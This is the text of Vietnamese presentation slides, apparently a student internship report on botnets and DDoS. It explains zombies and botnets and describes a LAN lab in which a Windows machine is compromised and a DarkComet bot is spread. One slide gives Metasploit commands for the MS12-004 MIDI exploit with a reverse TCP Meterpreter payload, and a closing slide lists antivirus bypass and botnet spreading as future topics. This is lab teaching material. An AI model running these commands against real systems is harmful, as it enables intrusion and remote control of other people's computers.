4. Mở đầu
Quy mô và số lượng các vụ tấn
công DDoS nữa đầu năm 2014
5. Những chương trình tương tự Trojan backdoor cho phép kẻ
tấn công sử dụng máy của họ như là những Zoombie ( máy
tính thây ma – máy tính bị chiếm quyền điều khiển hoàn toàn )
và chúng chủ động kết nối với một Server để dễ dàng điều
khiển
Mở đầu
Botnet
6. Mở đầu
Mạng lưới botnet
là một mạng rất lớn gồm hàng trăm hàng ngàn máy tính Zombie kết nối với một
máy chủ mIRC ( Internet Replay Chat ) hoặc qua các máy chủ DNS để nhận lệnh
từ hacker một cách nhanh nhất . Các mạng bot gồm hàng ngàn “thành viên” là
một công cụ lý tưởng cho các cuộc chiến như DDOS , spam, cài đặt các chương
trình quảng cáo …..
7. Nội dung thực tập
Giai đoạn 1: Thử nghiệm xâm nhập vào máy nạn nhân trong môi trường LAN
Giai đoạn 2: Thử nghiệm tạo và phát tán bot bằng DarkComet
11. Giai đoạn 1
Thử nghiệm xâm nhập windows qua lỗi MS12_004
use exploit/windows/browser/ms12_004_midi
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.0.126
set LHOST 192.168.0.126
exploit
24. Hướng phát triển mở rộng
- Các phương pháp bypass các antivirus hiện tại
- Các loại bot phổ biến và nguy hiểm khác
- Các cách phát tán botnet
- Các cách khai thác botnet
- Các phương pháp hiệu quả để phòng chống trở thành zombie, botnet